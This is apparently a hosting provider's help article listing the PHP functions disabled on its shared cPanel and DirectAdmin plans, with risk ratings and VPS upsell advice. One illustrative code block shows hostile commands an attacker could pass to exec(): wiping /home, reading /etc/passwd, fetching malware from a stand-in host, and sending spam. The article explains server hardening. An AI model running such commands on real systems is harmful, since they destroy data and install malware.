Overview
On shared hosting environments (both cPanel and DirectAdmin), certain PHP functions are disabled to protect the server and all hosted websites from security threats. This is an industry-standard security practice followed by all major hosting providers.
This article explains which functions are disabled, why they pose security risks, and what solutions are available if your application requires these functions.
- All cPanel Shared Hosting Plans
- All DirectAdmin Shared Hosting Plans
Why Are Some PHP Functions Disabled?
Shared hosting means hundreds of websites share the same server. If one website is compromised (through weak passwords, outdated plugins, or vulnerabilities), attackers could potentially:
- Attack other websites on the same server
- Send spam emails damaging the server's reputation
- Steal sensitive data from databases
- Use the server for illegal activities
- Cause the server IP to be blacklisted, affecting all customers
By disabling dangerous functions, we ensure that even if one website is compromised, the damage remains contained and cannot spread to other customers.
List of Disabled PHP Functions
1. Command Execution Functions
These functions allow PHP to execute system commands directly on the server.
| Function | Risk Level | Why Disabled |
|---|---|---|
exec() |
Critical | Executes system commands. Attackers can run malicious commands on the server. |
shell_exec() |
Critical | Executes commands via shell. Can be used to take complete control of the server. |
system() |
Critical | Executes external programs. Allows arbitrary command execution. |
passthru() |
Critical | Executes commands and displays raw output. |
popen() |
Critical | Opens process file pointer. Can execute arbitrary commands. |
proc_open() |
Critical | Execute a command and open file pointers for I/O. |
proc_close() |
High | Closes a process opened by proc_open(). |
proc_get_status() |
High | Get information about a process. |
proc_terminate() |
High | Kills a process opened by proc_open(). |
proc_nice() |
Medium | Change process priority. Can affect server performance. |
pcntl_exec() |
Critical | Executes program in current process space. |
pcntl_fork() |
Critical | Creates child processes. Can overload the server. |
pcntl_signal() |
High | Installs signal handlers. |
pcntl_waitpid() |
High | Waits on or returns status of forked child. |
pcntl_alarm() |
Medium | Set an alarm clock for delivery of a signal. |
// If exec() was enabled, an attacker could run:
exec('rm -rf /home/*'); // Delete all user data
exec('cat /etc/passwd'); // Read system files
exec('wget malware.com/virus'); // Download malware
exec('mail -s "Spam" victim@..'); // Send spam from your server
2. Network/Socket Functions
These functions allow PHP to make outbound network connections.
| Function | Risk Level | Why Disabled |
|---|---|---|
curl_exec() |
High | Executes cURL session. Can make unauthorized outbound connections for data theft. |
curl_multi_exec() |
High | Runs multiple cURL handles simultaneously. |
fsockopen() |
High | Opens socket connection. Can bypass firewall and exfiltrate data. |
pfsockopen() |
High | Persistent socket connection. Same risks as fsockopen(). |
stream_socket_client() |
High | Create socket connection. Alternative method to fsockopen(). |
stream_socket_server() |
High | Create server socket. Can open unauthorized ports on the server. |
socket_create() |
High | Create raw socket. Low-level network access. |
socket_connect() |
High | Connect socket to destination. |
socket_bind() |
High | Bind socket to an address. |
socket_listen() |
High | Listen for connections on a socket. |
socket_accept() |
High | Accept a connection on a socket. |
- SSRF Attacks (Server-Side Request Forgery): Access internal services like databases, admin panels, and cloud metadata APIs
- Data Exfiltration: Silently send stolen customer data (credit cards, passwords, personal info) to external attacker servers
- Botnet Participation: Make your server part of a network used for DDoS attacks
- Spam Distribution: Send thousands of spam emails through your server
- IP Blacklisting: Server IP gets blacklisted, affecting email delivery for ALL customers on the server
3. File System Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
symlink() |
High | Creates symbolic links. Can potentially access files outside allowed directories. |
link() |
High | Creates hard links. Similar risks to symlink(). |
4. Information Disclosure Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
phpinfo() |
Medium | Displays complete PHP configuration including server paths, versions, and security settings. |
show_source() |
High | Displays source code of PHP files. Can expose passwords and application logic. |
highlight_file() |
High | Syntax highlights and displays file contents. Same risks as show_source(). |
To check PHP configuration, use SSH terminal:
php -i | less5. Environment & System Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
dl() |
Critical | Loads PHP extension at runtime. Can load malicious extensions. |
ini_alter() |
High | Alias of ini_set(). Can change PHP security settings. |
apache_setenv() |
Medium | Sets Apache environment variable. |
apache_child_terminate() |
Medium | Terminate Apache child process after request. |
virtual() |
Medium | Performs Apache sub-request. |
openlog() |
Medium | Opens connection to system logger. |
syslog() |
Medium | Generates system log message. Can fill logs with garbage. |
6. POSIX Functions
POSIX functions interact directly with the operating system.
| Function | Risk Level | Why Disabled |
|---|---|---|
posix_kill() |
Critical | Sends signal to process. Can kill critical server processes. |
posix_setuid() |
Critical | Sets user ID. Can escalate privileges to root. |
posix_setgid() |
Critical | Sets group ID. Can escalate privileges. |
posix_seteuid() |
Critical | Sets effective user ID. |
posix_setegid() |
Critical | Sets effective group ID. |
posix_mkfifo() |
High | Creates FIFO special file (named pipe). |
posix_getpwuid() |
Medium | Returns user information by user ID. |
posix_uname() |
Low | Returns system information. |
Complete List of Disabled Functions
Applications That May Be Affected
| Application Type | Functions Needed | Recommended Solution |
|---|---|---|
| E-commerce Payment Gateways (Razorpay, PayU, CCAvenue, PayPal, Stripe) |
curl_exec, fsockopen | VPS Hosting |
| OpenCart / PrestaShop / Magento / WooCommerce (with payment integrations) |
curl_exec, stream_socket_client | VPS Hosting |
| SMS API Integrations (Twilio, MSG91, TextLocal) |
curl_exec, fsockopen | VPS Hosting |
| Email Marketing Tools (Mailchimp API, SendGrid) |
curl_exec, socket functions | VPS Hosting |
| Video/Image Processing (FFmpeg, ImageMagick via CLI) |
exec, shell_exec | VPS Hosting |
| Git/Composer Deployment | exec, proc_open | VPS Hosting |
| Backup Plugins (UpdraftPlus, BackupBuddy) |
exec, system | Use cPanel/DirectAdmin Backup |
| WordPress with External APIs | Depends on plugin | Most plugins work; payment plugins need VPS |
What Functions ARE Allowed?
Many common operations still work perfectly. The cURL extension is enabled - only the execution function is restricted.
cURL Functions:
|
File Functions:
|
Database Functions:
|
Other:
|
Solutions If You Need Disabled Functions
🚀 Option 1: Upgrade to VPS Hosting (Recommended)
VPS (Virtual Private Server) hosting gives you complete control over your server environment.
VPS Benefits:
|
Ideal For:
|
🔧 Option 2: Use Control Panel Built-in Features
| Instead Of | Use This (cPanel) | Use This (DirectAdmin) |
|---|---|---|
| Backup plugins using exec() | cPanel → Backup / Backup Wizard | DirectAdmin → Create/Restore Backups |
| Cron jobs with shell commands | cPanel → Cron Jobs | DirectAdmin → Cronjobs |
| phpinfo() for debugging | SSH: php -i | less |
|
| File Manager operations | cPanel → File Manager | DirectAdmin → File Manager |
| Database management | cPanel → phpMyAdmin | DirectAdmin → phpMyAdmin |
Frequently Asked Questions
Q: Can you enable these functions for my account only?
A: No. PHP's disable_functions directive is a server-wide security setting and cannot be overridden for individual accounts on shared hosting. This ensures consistent security for all customers.
Q: My WordPress site works fine. Why would I need these functions?
A: Basic WordPress functionality works without these functions. You only need them for specific use cases like payment gateway plugins (WooCommerce with Razorpay/Stripe), external API integrations, or image/video processing.
Q: Is this restriction unique to DomainIndia?
A: No. This is an industry-standard security practice. All major hosting providers (GoDaddy, Bluehost, Hostinger, SiteGround, HostGator) disable these functions on shared hosting for the same security reasons.
Q: How do I know if my application needs these functions?
A: Check your application's error logs. If you see errors like:"curl_exec() has been disabled for security reasons""fsockopen() has been disabled for security reasons"
Then your application requires VPS hosting.
Q: Will upgrading PHP version enable these functions?
A: No. These functions are disabled across all PHP versions (5.6, 7.x, 8.x) on shared hosting servers.
Q: I'm running an e-commerce store. What should I do?
A: For e-commerce stores requiring payment gateway integration (Razorpay, PayU, CCAvenue, Stripe, PayPal), we strongly recommend VPS hosting. It provides the necessary functions plus better performance and security for handling transactions.
Security Measures on Our Shared Hosting
Even with function restrictions, your hosting includes enterprise-grade security:
| Protection | Description |
|---|---|
| 🔒 CloudLinux CageFS | Complete filesystem isolation - users cannot see or access other accounts |
| 🛡️ Imunify360 | Real-time malware scanning, proactive defense, and automatic cleanup |
| 🔥 ModSecurity WAF | Web Application Firewall with comprehensive ruleset blocking attacks |
| 🧱 CSF Firewall | Advanced firewall with brute-force protection and intrusion detection |
| 💾 Daily Backups | Automatic daily backups with easy restore options |
| 🔐 Free SSL Certificates | Let's Encrypt SSL automatically issued for all domains |
| 📧 Spam Protection | SpamAssassin and email authentication (SPF, DKIM, DMARC) |
Need Help?
If you have questions about disabled functions or need help finding an alternative solution, our support team is here to help:
| 📧 Email: [email protected] | 💬 Live Chat: Available |
| 🎫 Support Ticket: Submit a Ticket | 📞 Phone: Check Contact Page |
Article ID: KB-PHP-DISABLED-001
Last Updated: December 2024
Applies To: All cPanel & DirectAdmin Shared Hosting Plans
Category: Web Hosting Essentials → Advanced Hosting Techniques
